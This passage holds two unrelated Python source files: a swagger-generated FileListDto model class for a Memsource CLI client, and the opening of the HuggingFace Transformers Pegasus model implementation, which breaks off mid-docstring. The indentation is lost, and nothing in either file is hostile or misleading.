from memsource_cli.models.file_dto import FileDto # noqa: F401,E501
class FileListDto(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'files': 'list[FileDto]',
'current_folder': 'str',
'encoded_current_folder': 'str',
'root_folder': 'bool',
'last_changed_files': 'list[FileDto]'
}
attribute_map = {
'files': 'files',
'current_folder': 'currentFolder',
'encoded_current_folder': 'encodedCurrentFolder',
'root_folder': 'rootFolder',
'last_changed_files': 'lastChangedFiles'
}
def __init__(self, files=None, current_folder=None, encoded_current_folder=None, root_folder=None, last_changed_files=None): # noqa: E501
"""FileListDto - a model defined in Swagger""" # noqa: E501
self._files = None
self._current_folder = None
self._encoded_current_folder = None
self._root_folder = None
self._last_changed_files = None
self.discriminator = None
if files is not None:
self.files = files
if current_folder is not None:
self.current_folder = current_folder
if encoded_current_folder is not None:
self.encoded_current_folder = encoded_current_folder
if root_folder is not None:
self.root_folder = root_folder
if last_changed_files is not None:
self.last_changed_files = last_changed_files
@property
def files(self):
"""Gets the files of this FileListDto. # noqa: E501
:return: The files of this FileListDto. # noqa: E501
:rtype: list[FileDto]
"""
return self._files
@files.setter
def files(self, files):
"""Sets the files of this FileListDto.
:param files: The files of this FileListDto. # noqa: E501
:type: list[FileDto]
"""
self._files = files
@property
def current_folder(self):
"""Gets the current_folder of this FileListDto. # noqa: E501
:return: The current_folder of this FileListDto. # noqa: E501
:rtype: str
"""
return self._current_folder
@current_folder.setter
def current_folder(self, current_folder):
"""Sets the current_folder of this FileListDto.
:param current_folder: The current_folder of this FileListDto. # noqa: E501
:type: str
"""
self._current_folder = current_folder
@property
def encoded_current_folder(self):
"""Gets the encoded_current_folder of this FileListDto. # noqa: E501
:return: The encoded_current_folder of this FileListDto. # noqa: E501
:rtype: str
"""
return self._encoded_current_folder
@encoded_current_folder.setter
def encoded_current_folder(self, encoded_current_folder):
"""Sets the encoded_current_folder of this FileListDto.
:param encoded_current_folder: The encoded_current_folder of this FileListDto. # noqa: E501
:type: str
"""
self._encoded_current_folder = encoded_current_folder
@property
def root_folder(self):
"""Gets the root_folder of this FileListDto. # noqa: E501
:return: The root_folder of this FileListDto. # noqa: E501
:rtype: bool
"""
return self._root_folder
@root_folder.setter
def root_folder(self, root_folder):
"""Sets the root_folder of this FileListDto.
:param root_folder: The root_folder of this FileListDto. # noqa: E501
:type: bool
"""
self._root_folder = root_folder
@property
def last_changed_files(self):
"""Gets the last_changed_files of this FileListDto. # noqa: E501
:return: The last_changed_files of this FileListDto. # noqa: E501
:rtype: list[FileDto]
"""
return self._last_changed_files
@last_changed_files.setter
def last_changed_files(self, last_changed_files):
"""Sets the last_changed_files of this FileListDto.
:param last_changed_files: The last_changed_files of this FileListDto. # noqa: E501
:type: list[FileDto]
"""
self._last_changed_files = last_changed_files
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(FileListDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FileListDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
the-stack_106_14768
|
# coding=utf-8
# Copyright 2021, Google and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch PEGASUS model. """
import copy
import math
import random
from typing import Optional, Tuple
import numpy as np
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss
from ...activations import ACT2FN
from ...file_utils import (
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_outputs import (
BaseModelOutput,
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
Seq2SeqLMOutput,
Seq2SeqModelOutput,
)
from ...modeling_utils import PreTrainedModel
from ...utils import logging
from .configuration_pegasus import PegasusConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "google/pegasus-large"
_CONFIG_FOR_DOC = "PegasusConfig"
_TOKENIZER_FOR_DOC = "PegasusTokenizer"
PEGASUS_PRETRAINED_MODEL_ARCHIVE_LIST = [
"google/pegasus-large",
# See all PEGASUS models at https://huggingface.co/models?filter=pegasus
]
# Copied from transformers.models.bart.modeling_bart.shift_tokens_right
def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int):
"""
Shift input ids one token to the right.
"""
shifted_input_ids = input_ids.new_zeros(input_ids.shape)
shifted_input_ids[:, 1:] = input_ids[:, :-1].clone()
shifted_input_ids[:, 0] = decoder_start_token_id
assert pad_token_id is not None, "self.model.config.pad_token_id has to be defined."
# replace possible -100 values in labels by `pad_token_id`
shifted_input_ids.masked_fill_(shifted_input_ids == -100, pad_token_id)
return shifted_input_ids
# Copied from transformers.models.bart.modeling_bart._make_causal_mask
def _make_causal_mask(input_ids_shape: torch.Size, dtype: torch.dtype, past_key_values_length: int = 0):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), float("-inf"))
mask_cond = torch.arange(mask.size(-1))
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
if past_key_values_length > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)
# Copied from transformers.models.bart.modeling_bart._expand_mask
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):
"""
Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.
"""
bsz, src_len = mask.size()
tgt_len = tgt_len if tgt_len is not None else src_len
expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype)
inverted_mask = 1.0 - expanded_mask
return inverted_mask.masked_fill(inverted_mask.bool(), torch.finfo(dtype).min)
# Copied from transformers.models.marian.modeling_marian.MarianSinusoidalPositionalEmbedding with Marian->Pegasus
class PegasusSinusoidalPositionalEmbedding(nn.Embedding):
"""This module produces sinusoidal positional embeddings of any length."""
def __init__(self, num_positions: int, embedding_dim: int, padding_idx: Optional[int] = None):
super().__init__(num_positions, embedding_dim)
self.weight = self._init_weight(self.weight)
@staticmethod
def _init_weight(out: nn.Parameter):
"""
Identical to the XLM create_sinusoidal_embeddings except features are not interleaved. The cos features are in
the 2nd half of the vector. [dim // 2:]
"""
n_pos, dim = out.shape
position_enc = np.array(
[[pos / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)] for pos in range(n_pos)]
)
out.requires_grad = False # set early to avoid an error in pytorch-1.8+
sentinel = dim // 2 if dim % 2 == 0 else (dim // 2) + 1
out[:, 0:sentinel] = torch.FloatTensor(np.sin(position_enc[:, 0::2]))
out[:, sentinel:] = torch.FloatTensor(np.cos(position_enc[:, 1::2]))
out.detach_()
return out
@torch.no_grad()
def forward(self, input_ids_shape: torch.Size, past_key_values_length: int = 0):
"""`input_ids_shape` is expected to be [bsz x seqlen]."""
bsz, seq_len = input_ids_shape[:2]
positions = torch.arange(
past_key_values_length, past_key_values_length + seq_len, dtype=torch.long, device=self.weight.device
)
return super().forward(positions)
# Copied from transformers.models.bart.modeling_bart.BartAttention with Bart->Pegasus
class PegasusAttention(nn.Module):
"""Multi-headed attention from 'Attention Is All You Need' paper"""
def __init__(
self,
embed_dim: int,
num_heads: int,
dropout: float = 0.0,
is_decoder: bool = False,
bias: bool = True,
):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
self.dropout = dropout
self.head_dim = embed_dim // num_heads
assert (
self.head_dim * num_heads == self.embed_dim
), f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {num_heads})."
self.scaling = self.head_dim ** -0.5
self.is_decoder = is_decoder
self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):
return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()
def forward(
self,
hidden_states: torch.Tensor,
key_value_states: Optional[torch.Tensor] = None,
past_key_value: Optional[Tuple[torch.Tensor]] = None,
attention_mask: Optional[torch.Tensor] = None,
layer_head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:
"""Input shape: Batch x Time x Channel"""
# if key_value_states are provided this layer is used as a cross-attention layer
# for the decoder
is_cross_attention = key_value_states is not None
bsz, tgt_len, embed_dim = hidden_states.size()
# get query proj
query_states = self.q_proj(hidden_states) * self.scaling
# get key, value proj
if is_cross_attention and past_key_value is not None:
# reuse k,v, cross_attentions
key_states = past_key_value[0]
value_states = past_key_value[1]
elif is_cross_attention:
# cross_attentions
key_states = self._shape(self.k_proj(key_value_states), -1, bsz)
value_states = self._shape(self.v_proj(key_value_states), -1, bsz)
elif past_key_value is not None:
# reuse k, v, self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
key_states = torch.cat([past_key_value[0], key_states], dim=2)
value_states = torch.cat([past_key_value[1], value_states], dim=2)
else:
# self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
if self.is_decoder:
# if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_states, value_states)
proj_shape = (bsz * self.num_heads, -1, self.head_dim)
query_states = self._shape(query_states, tgt_len, bsz).view(*proj_shape)
key_states = key_states.view(*proj_shape)
value_states = value_states.view(*proj_shape)
src_len = key_states.size(1)
attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))
if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len):
raise ValueError(
f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is {attn_weights.size()}"
)
if attention_mask is not None:
if attention_mask.size() != (bsz, 1, tgt_len, src_len):
raise ValueError(
f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}"
)
attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask
attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)
attn_weights = nn.functional.softmax(attn_weights, dim=-1)
if layer_head_mask is not None:
if layer_head_mask.size() != (self.num_heads,):
raise ValueError(
f"Head mask for a single layer should be of size {(self.num_heads,)}, but is {layer_head_mask.size()}"
)
attn_weights = layer_head_mask.view(1, -1, 1, 1) * attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)
if output_attentions:
# this operation is a bit awkward, but it's required to
# make sure that attn_weights keeps its gradient.
# In order to do so, attn_weights have to be reshaped
# twice and have to be reused in the following
attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, tgt_len, src_len)
else:
attn_weights_reshaped = None
attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)
attn_output = torch.bmm(attn_probs, value_states)
if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim):
raise ValueError(
f"`attn_output` should be of size {(bsz, self.num_heads, tgt_len, self.head_dim)}, but is {attn_output.size()}"
)
attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)
attn_output = attn_output.transpose(1, 2)
attn_output = attn_output.reshape(bsz, tgt_len, embed_dim)
attn_output = self.out_proj(attn_output)
return attn_output, attn_weights_reshaped, past_key_value
# Copied from transformers.models.mbart.modeling_mbart.MBartEncoderLayer with MBart->Pegasus
class PegasusEncoderLayer(nn.Module):
def __init__(self, config: PegasusConfig):
super().__init__()
self.embed_dim = config.d_model
self.self_attn = PegasusAttention(
embed_dim=self.embed_dim,
num_heads=config.encoder_attention_heads,
dropout=config.attention_dropout,
)
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)
self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: torch.Tensor,
layer_head_mask: torch.Tensor,
output_attentions: bool = False,
):
"""
Args:
hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape `(seq_len, batch, embed_dim)`
attention_mask (:obj:`torch.FloatTensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
"""
residual = hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
hidden_states, attn_weights, _ = self.self_attn(
hidden_states=hidden_states,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
residual = hidden_states
hidden_states = self.final_layer_norm(hidden_states)
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
if hidden_states.dtype == torch.float16 and (
torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any()
):
clamp_value = torch.finfo(hidden_states.dtype).max - 1000
hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value)
outputs = (hidden_states,)
if output_attentions:
outputs += (attn_weights,)
return outputs
# Copied from transformers.models.mbart.modeling_mbart.MBartDecoderLayer with MBart->Pegasus
class PegasusDecoderLayer(nn.Module):
def __init__(self, config: PegasusConfig):
super().__init__()
self.embed_dim = config.d_model
self.self_attn = PegasusAttention(
embed_dim=self.embed_dim,
num_heads=config.decoder_attention_heads,
dropout=config.attention_dropout,
is_decoder=True,
)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.encoder_attn = PegasusAttention(
self.embed_dim,
config.decoder_attention_heads,
dropout=config.attention_dropout,
is_decoder=True,
)
self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim)
self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
layer_head_mask: Optional[torch.Tensor] = None,
cross_attn_layer_head_mask: Optional[torch.Tensor] = None,
past_key_value: Optional[Tuple[torch.Tensor]] = None,
output_attentions: Optional[bool] = False,
use_cache: Optional[bool] = True,
):
"""
Args:
hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape `(seq_len, batch, embed_dim)`
attention_mask (:obj:`torch.FloatTensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
encoder_hidden_states (:obj:`torch.FloatTensor`): cross attention input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_attention_mask (:obj:`torch.FloatTensor`): encoder attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`.
cross_attn_layer_head_mask (:obj:`torch.FloatTensor`): mask for cross-attention heads in a given layer of
size `(decoder_attention_heads,)`.
past_key_value (:obj:`Tuple(torch.FloatTensor)`): cached past key and value projection states
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
"""
residual = hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
# Self Attention
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
# add present self-attn cache to positions 1,2 of present_key_value tuple
hidden_states, self_attn_weights, present_key_value = self.self_attn(
hidden_states=hidden_states,
past_key_value=self_attn_past_key_value,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
# Cross-Attention Block
cross_attn_present_key_value = None
cross_attn_weights = None
if encoder_hidden_states is not None:
residual = hidden_states
hidden_states = self.encoder_attn_layer_norm(hidden_states)
# cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn(
hidden_states=hidden_states,
key_value_states=encoder_hidden_states,
attention_mask=encoder_attention_mask,
layer_head_mask=cross_attn_layer_head_mask,
past_key_value=cross_attn_past_key_value,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
# add cross-attn to positions 3,4 of present_key_value tuple
present_key_value = present_key_value + cross_attn_present_key_value
# Fully Connected
residual = hidden_states
hidden_states = self.final_layer_norm(hidden_states)
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
outputs = (hidden_states,)
if output_attentions:
outputs += (self_attn_weights, cross_attn_weights)
if use_cache:
outputs += (present_key_value,)
return outputs
class PegasusPreTrainedModel(PreTrainedModel):
config_class = PegasusConfig
base_model_prefix = "model"
def _init_weights(self, module):
std = self.config.init_std
if isinstance(module, nn.Linear):
module.weight.data.normal_(mean=0.0, std=std)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, PegasusSinusoidalPositionalEmbedding):
pass
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=std)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
PEGASUS_START_DOCSTRING = r"""
This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic
methods the library implements for all its model (such as downloading or saving, resizing the input embeddings,
pruning heads etc.)
This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__
subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to
general usage and behavior.
Parameters:
config (:class:`~transformers.PegasusConfig`):
Model configuration class with all the parameters of the model. Initializing with a config file does not
load the weights associated with the model, only the configuration. Check out the
:meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
PEGASUS_GENERATION_EXAMPLE = r"""
Summarization example::
>>> from transformers import PegasusTokenizer, PegasusForConditionalGeneration
>>> model = PegasusForConditionalGeneration.from_pretrained('google/pegasus-xsum')
>>> tokenizer = PegasusTokenizer.from_pretrained('google/pegasus-xsum')
>>> ARTICLE_TO_SUMMARIZE = (
... "PG&E stated it scheduled the blackouts in response to forecasts for high winds "
... "amid dry conditions. The aim is to reduce the risk of wildfires. Nearly 800 thousand customers were "
... "scheduled to be affected by the shutoffs which were expected to last through at least midday tomorrow."
... )
>>> inputs = tokenizer([ARTICLE_TO_SUMMARIZE], max_length=1024, return_tensors='pt')
>>> # Generate Summary
>>> summary_ids = model.generate(inputs['input_ids'])
>>> print([tokenizer.decode(g, skip_special_tokens=True, clean_up_tokenization_spaces=False) for g in summary_ids])
"""
PEGASUS_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you provide
it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
decoder_input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, target_sequence_length)`, `optional`):
Indices of decoder input sequence tokens in the vocabulary.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are decoder input IDs? <../glossary.html#decoder-input-ids>`__
Pegasus uses the :obj:`pad_token_id` as the starting token for :obj:`decoder_input_ids` generation. If
:obj:`past_key_values` is used, optionally only the last :obj:`decoder_input_ids` have to be input (see
:obj:`past_key_values`).
decoder_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size, target_sequence_length)`, `optional`):
Default behavior: generate a tensor that ignores pad tokens in :obj:`decoder_input_ids`. Causal mask will
also be used by default.
head_mask (:obj:`torch.Tensor` of shape :obj:`(encoder_layers, encoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
decoder_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the cross-attention modules in the decoder. Mask values selected in ``[0,
1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
encoder_outputs (:obj:`tuple(tuple(torch.FloatTensor)`, `optional`):
Tuple consists of (:obj:`last_hidden_state`, `optional`: :obj:`hidden_states`, `optional`:
:obj:`attentions`) :obj:`last_hidden_state` of shape :obj:`(batch_size, sequence_length, hidden_size)`,
`optional`) is a sequence of hidden-states at the output of the last layer of the encoder. Used in the
cross-attention of the decoder.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2 tensors
of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of
shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the cross-attention
blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all :obj:`decoder_input_ids`` of shape :obj:`(batch_size, sequence_length)`.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert :obj:`input_ids` indices into associated
vectors than the model's internal embedding lookup matrix.
decoder_inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, target_sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`decoder_input_ids` you can choose to directly pass an embedded
representation. If :obj:`past_key_values` is used, optionally only the last :obj:`decoder_inputs_embeds`
have to be input (see :obj:`past_key_values`). This is useful if you want more control over how to convert
:obj:`decoder_input_ids` indices into associated vectors than the model's internal embedding lookup matrix.
If :obj:`decoder_input_ids` and :obj:`decoder_inputs_embeds` are both unset, :obj:`decoder_inputs_embeds`
takes the value of :obj:`inputs_embeds`.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
class PegasusEncoder(PegasusPreTrainedModel):
"""
Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a
:class:`PegasusEncoderLayer`.
Args:
config: PegasusConfig
embed_tokens (nn.Embedding): output embedding
"""
def __init__(self, config: PegasusConfig, embed_tokens: Optional[nn.Embedding] = None):
super().__init__(config)
self.dropout = config.dropout
self.layerdrop = config.encoder_layerdrop
embed_dim = config.d_model
self.padding_idx = config.pad_token_id
self.max_source_positions = config.max_position_embeddings
self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0
if embed_tokens is not None:
self.embed_tokens = embed_tokens
else:
self.embed_tokens = nn.Embedding(config.vocab_size, embed_dim, self.padding_idx)
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
config.max_position_embeddings,
embed_dim,
self.padding_idx,
)
self.layers = nn.ModuleList([PegasusEncoderLayer(config) for _ in range(config.encoder_layers)])
self.layer_norm = nn.LayerNorm(config.d_model)
self.init_weights()
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
logger.info(f"Setting `config.max_position_embeddings={new_num_position_embeddings}`...")
self.config.max_position_embeddings = new_num_position_embeddings
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
self.config.max_position_embeddings,
self.config.d_model,
self.padding_idx,
)
def get_position_embeddings(self) -> nn.Embedding:
"""
Returns the position embeddings matrix
"""
return self.embed_positions
def forward(
self,
input_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`
for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
head_mask (:obj:`torch.Tensor` of shape :obj:`(encoder_layers, encoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded
representation. This is useful if you want more control over how to convert :obj:`input_ids` indices
into associated vectors than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
